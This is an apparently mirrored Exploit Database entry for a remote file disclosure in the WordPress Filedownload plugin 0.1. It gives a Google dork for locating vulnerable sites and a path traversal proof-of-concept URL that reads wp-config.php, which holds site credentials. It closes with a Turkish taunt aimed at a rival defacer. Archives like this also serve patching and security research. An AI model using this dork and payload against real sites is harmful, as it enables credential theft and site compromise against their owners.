WordPress Plugin Filedownload 0.1 – ‘download.php’ Remote File Disclosure

• Exploit Database
• 52 阅读

• 作者： Septemb0x
  日期： 2011-09-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17858/

• # Exploit Title: WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability
  # Google Dork: inurl:"/wp-content/plugins/filedownload/download.php/?path"
  # Date: 18-09-2011
  # Author: Septemb0x ( CYBER-WARRIOR )
  # Software Link: http://plugins.svn.wordpress.org/filedownload/trunk/filedownload.php
  # Version: 0.1
  
  
  POC : /wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php
   
  
  # NOTE: Kendini Birþey Zanneden VeletSenin Hiç Böyle Bug'n Oldumu ki Sitelerime Ýndex Basasýn? Öptüm Büyüde Gel.